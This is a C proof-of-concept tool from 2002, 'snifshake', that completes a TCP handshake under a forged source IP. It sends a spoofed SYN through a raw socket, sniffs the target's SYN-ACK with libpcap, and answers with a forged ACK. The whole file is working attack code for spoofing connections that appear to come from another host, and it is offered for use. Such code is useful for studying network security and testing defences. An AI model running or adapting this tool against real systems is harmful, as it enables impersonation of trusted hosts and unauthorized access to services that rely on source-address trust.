/*
 * snifshake -- proof of concept tcp handshake with spoofed packets
 *
 * gcc -Wall snifshake.c -o snifshake -lpthread -lpcap
 *
 * skape
 * 06/01/2002
 */

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

#include <netinet/in_systm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#include <signal.h>
#include <netdb.h>
#include <arpa/inet.h>

#include <pthread.h>
#include <pcap.h>

#define IP  struct ip
#define TCP struct tcphdr

typedef struct _global {

	char *interface;
	int rawFd;

	unsigned long target;
	unsigned long source;
	unsigned int  port;

	int parentPid;
	int initCode;

	pthread_mutex_t initMutex;

} GLOBAL;

GLOBAL global;

unsigned long resolve(const char *addr);
unsigned short ipChecksum(unsigned short *ptr, int nbytes);
int sendTcp(unsigned long dstAddr, unsigned long srcAddr, unsigned int srcPort, unsigned int dstPort, unsigned char flags, unsigned long seq, unsigned long ack);
void watchPackets(void *null);

int main(int argc, char **argv)
{
	extern char *optarg;
	int c, set = 1;
	pthread_t id;

	memset(&global, 0, sizeof(GLOBAL));

	srand(time(NULL) | (global.parentPid = getpid()));

	global.target = global.source = -1;
	global.interface = "eth0";
  
	pthread_mutex_init(&global.initMutex, NULL); 
	
	while ((c = getopt(argc, argv, "t:s:p:i:")) != EOF)
	{
		switch (c)
		{
			case 't':
				global.target = resolve(optarg);
				break;
			case 's':
				global.source = inet_addr(optarg);
				break;
			case 'p':
				global.port   = atoi(optarg);
				break;
			case 'i':
				global.interface = optarg;
				break;	
		}
	}

	if ((global.target == -1) || (global.source == -1) || (global.port <= 0))
	{
		fprintf(stdout,"One or more arguments specified was invalid.\n");
		return 0;
	}

	if ((global.rawFd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0)
	{
		perror("socket");
		return 0;
	}

	if (setsockopt(global.rawFd, IPPROTO_IP, IP_HDRINCL, (char *) &set, sizeof(set)) < 0)
	{
		perror("setsockopt");
		return 0;
	}

	pthread_mutex_lock(&global.initMutex);

	pthread_create(&id, NULL, (void *(*)(void *))watchPackets, NULL);

	pthread_mutex_lock(&global.initMutex);

	if (global.initCode != 1)
		return (int)fprintf(stdout,"failed to start packet sniffer.\n");

	if (!sendTcp(global.target, global.source, (rand() & 0xFFFE) + 1, global.port, TH_SYN, rand(), rand()))
		return (int)fprintf(stdout,"failed to send tcp syn.\n");

	pthread_mutex_lock(&global.initMutex);

	fprintf(stdout,"TCP handshake completed.\n");

	return 1;
}

unsigned long resolve(const char *addr)
{
	unsigned long ret;
	struct hostent *h;

	if ((ret = inet_addr(addr)) != -1) 
		return ret;

	if (!(h = gethostbyname(addr)))
		return -1;

	memcpy(&ret, h->h_addr, h->h_length);

	return ret;
}

unsigned short ipChecksum(unsigned short *ptr, int nbytes)
{
        
  register long sum;        
  u_short oddbyte;
  register u_short answer; 
   
  sum = 0;
  while (nbytes > 1)
    {   
      sum += *ptr++;
      nbytes -= 2;
    }
        
  if (nbytes == 1)
    {   
      oddbyte = 0;     
      *((u_char *) & oddbyte) = *(u_char *) ptr;     
      sum += oddbyte;
    }
   
  sum = (sum >> 16) + (sum & 0xffff); 
  sum += (sum >> 16);       
  answer = ~sum;           

  return (answer);
}

int sendTcp(unsigned long dstAddr, unsigned long srcAddr, unsigned int srcPort, unsigned int dstPort, unsigned char flags, unsigned long seq, unsigned long ack)
{
	unsigned int packetLen;
	unsigned char packet[(packetLen = sizeof(IP) + sizeof(TCP))];
	IP *iphdr = (IP *)packet;
	TCP *tcphdr = (TCP *)((unsigned char *)packet + sizeof(IP));
	struct sockaddr_in s;

	struct minimalip {
		unsigned long saddr;
		unsigned long daddr;
		unsigned char zero;
		unsigned char protocol;
		unsigned short length;
		TCP tcphdr;
	} minimalip;

	memset(&s, 0, sizeof(s));
	memset(packet, 0, packetLen);

	minimalip.saddr      = srcAddr;
	minimalip.daddr      = dstAddr;
	minimalip.zero       = 0;
	minimalip.protocol   = IPPROTO_TCP;
	minimalip.length     = htons(sizeof(TCP));

	iphdr->ip_v       = 4;
	iphdr->ip_hl      = 5;
	iphdr->ip_id      = rand() & 0xFFFF;
	iphdr->ip_src.s_addr = srcAddr;
	iphdr->ip_dst.s_addr = dstAddr;
	iphdr->ip_p       = IPPROTO_TCP;
	iphdr->ip_ttl     = 40;
	iphdr->ip_len     = packetLen;
	iphdr->ip_sum     = ipChecksum((u_short *)iphdr, sizeof(IP));

	s.sin_family      = AF_INET;
	s.sin_addr.s_addr = dstAddr;

	memset(tcphdr, 0, sizeof(TCP));

	tcphdr->th_sport = htons(srcPort);
	tcphdr->th_dport = htons(dstPort);
	tcphdr->th_seq   = htonl(seq);
	tcphdr->th_ack   = htonl(ack);
	tcphdr->th_off   = 5;
	tcphdr->th_flags = flags;

	memcpy(&minimalip.tcphdr, tcphdr, sizeof(TCP));

	tcphdr->th_sum   = ipChecksum((u_short *)&minimalip, sizeof(struct minimalip));

	fprintf(stdout,"Sending -> seq=%lu ack=%lu\n",seq,ack);

	if (sendto(global.rawFd, packet, packetLen, 0, (struct sockaddr *)&s, sizeof(s)) <= 0) 
	{
		perror("sendto");
		return 0;
	}

	return 1;
}

void watchPackets(void *null)
{
	char errorBuffer[PCAP_ERRBUF_SIZE];
	struct pcap_pkthdr packetHeader;
	pcap_t *pcapFd;
	unsigned char *newPacket;
	IP *iphdr;

	global.initCode = 0;

	pthread_detach(pthread_self());

	if (!(pcapFd = pcap_open_live(global.interface, 128, 0, 0, errorBuffer)))
		fprintf(stdout,"watchPackets(): failed to open interface '%s'.\n",global.interface);
	else
		global.initCode = 1;
	
	pthread_mutex_unlock(&global.initMutex);

	if (!pcapFd)
		pthread_exit(0);

	while ((newPacket = (char *)pcap_next(pcapFd, &packetHeader)) != NULL)
	{
		/* Make sure packet is a valid TCP packet length first. */
		if ((!newPacket) || (packetHeader.len < (16 + sizeof(IP) + sizeof(TCP))))
			continue;

		iphdr = (IP *)((unsigned char *)(newPacket) + 14);

		if (iphdr->ip_v != 0x4)
			continue;

		if ((iphdr->ip_src.s_addr == global.target) &&
		 	(iphdr->ip_dst.s_addr == global.source) &&
			(iphdr->ip_p == IPPROTO_TCP))
		{
			TCP *tcphdr = (TCP *)((unsigned char *)(iphdr) + sizeof(IP));
		
			if ((tcphdr->th_flags & TH_ACK) && (tcphdr->th_flags & TH_SYN))
			{
				fprintf(stdout,"Recving -> seq=%lu ack=%lu\n", (unsigned long)ntohl(tcphdr->th_seq),  (unsigned long)ntohl(tcphdr->th_ack));
				sendTcp(global.target, global.source, ntohs(tcphdr->th_dport), global.port, TH_ACK, ntohl(tcphdr->th_ack), ntohl(tcphdr->th_seq)+1);
			}
			else
			{
				if (tcphdr->th_flags & TH_RST)
					fprintf(stdout,"Recving -> Got RST!\n");
				else
					fprintf(stdout,"Got data packet! seq=%lu ack=%lu flags=%.4x\n",(unsigned long)ntohl(tcphdr->th_seq),(unsigned long)ntohl(tcphdr->th_ack),tcphdr->th_flags);
			}
		}


	}

	pthread_mutex_unlock(&global.initMutex);
}
